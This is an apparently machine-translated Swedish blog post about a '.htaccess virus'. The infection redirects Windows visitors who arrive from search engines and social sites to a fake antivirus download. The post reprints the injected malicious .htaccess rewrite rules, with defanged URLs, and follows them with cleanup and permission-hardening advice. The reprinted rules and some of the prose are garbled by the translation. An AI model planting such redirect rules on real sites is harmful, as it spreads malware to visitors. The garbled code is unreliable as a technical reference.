En ny form av virus som jag inte vet så mycket påverkar platser finns på otillförlitliga servrar där användarkonton / underdomänkonton kan "ses" mellan dem. Specifikt placeras värdkontona i mappen "vhosts“, Och skrivrätten till användarmapp från "vhosts" ges till en allmän användare ... av återförsäljaren i de flesta situationer. Det är en typisk metod för webbservrar som inte använder WHM / cPanel.
Koppprins
.Htaccess virusåtgärd - .htaccess hack
Virus påverkar filer .htaccess Site av offret. De tillade linjer / Direktiven till omdirigera besökare (kommer från yahoo, msn, google, facebook, yaindex, twitter, myspace, etc. högtrafiksajter och portaler) till vissa webbplatser som erbjuder "antivirus“. Det handlar om falska antivirusprogram, Som jag skrev i inledningen till Fake Antivirus Remover.
Här är vad det ser ut som en .htaccess påverkas: (inte komma åt innehåll URL: er raderna nedan)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine On
RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * * $ [NC, OR] Google.
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Linkedin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Livejasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Doubleclick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress. * $ [NC, ELLER]
RewriteCond% {HTTP_REFERER}. * * $ [NC, OR] Yahoo.
RewriteCond% {HTTP_REFERER}. * Fråga. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Gå. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Sök. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,ELLER]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]
De som använder WordPress de kommer att hitta dessa rader i filen .htaccess från public_html. Dessutom skapar en. Htaccess i samma mapp viruset wp-innehåll.
*Det finns situationer där istället visas peoriavascularsurgery.com dns.thesoulfoodcafe.com eller andra adresser.
Vad som gör detta virus.
När omdirigeras besökaren möts med öppna armar av meddelandet:
Varning!
Din dator innehåller olika tecken på förekomst av virus och skadliga program. din system kräver omedelbar antiviruskontroll!
System Säkerhet utför en snabb och gratis skanning av din dator efter virus och skadliga program.
Oavsett vilken knapp vi trycker på, vi tas till sidan "Min dator", Skapad för att imitera konstruktion XP. Det är här "skanningsprocessen" startar automatiskt, i slutet av vilken vi upptäcker att "vi är infekterade".
När du klickar på OK eller Avbryt, kommer den att starta ladda nerFilens setup.exe. Detta setup.exe är falska anti-virus påverkar systemet. Det kommer att installera en serie av skadlig kod som sprider virus ytterligare länkar, och förutom de en antivirusprogram (även falskt) som offret uppmanas att köpa.
De som redan har kontaktat denna form av virus kan använda Fake Antivirus Remover. Det rekommenderas också att skanna hela hårddisken. Rekommenderat Kaspersky Internet Security eller Kaspersky Anti-Virus.
Denna typ av virus drabbar Visitor OS-operativsystem Windows XP, Windows MIG Windows 2000 Windows NT Windows 98 si Windows 95. Hittills har inga kända fall av infektion i operativsystemen Windows Se ja Windows 7.
Hur kan vi eliminera detta virus. Htaccess-fil på servern, och hur man kan förebygga infektion.
1. Analysera misstänkta filer och radera koder. För att säkerställa att inte bara påverkat fil .htaccess är bättre analysera alla filer . Php si . Js.
2. Skriva om filen. Htaccess och det in den chmod 644 eller 744 med skrivrättigheter endast brukaren ägare.
3. När du skapar ett webbhotell för en webbplats mapp / Home eller / Webroot Detta kommer automatiskt att skapa en mapp som ofta har användarens namn (användaren att cPanel, ftp, Etc). För att undvika att skriva data och överföring av virus från en användare till en annan, rekommenderas att varje användare mapp som ska ställas in:
chmod 644 eller 744, 755 – 644 anges.
chown -R användarnamn mappnamn.
chgrp-R nume_user nume_folder
ls-all för att kontrollera om de lägena gjordes på rätt sätt. Ska visas något liknande:
drwx - x - x 12 dinamik dinamik 4096 6 maj 14:51 dinamik /
drwx - x - x 10 duran duran 4096 7 mar 07:46 duran /
drwx - x - x 12 provrör provrör 4096 jan 29 11:23 provrör /
drwxr-xr-x 14 express express 4096 26 februari 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19 maj 01:09 ezo /
drwx - x - x 9 farma farma 4096 19 dec 22:29 farma /
Om något av ovanstående kommer userele FTP Infekterade filerDet kan inte skicka viruset till en annan användare värd. Det är ett minimi skyddsnät för att skydda konton lagras på en webbserver.
Gemensamma delar av de områden som drabbats av denna typ av virus.
Alla berörda domäner omdirigerar besökare till webbplatser som innehåller domännamnet "/main.php? s = 4 & H".
Detta "virus. htaccess”Påverkar alla typer av CMS (joomla, WordPress, phpBBEtc.) som använder .htaccess.
.htaccess Virus Hack & Redirect.
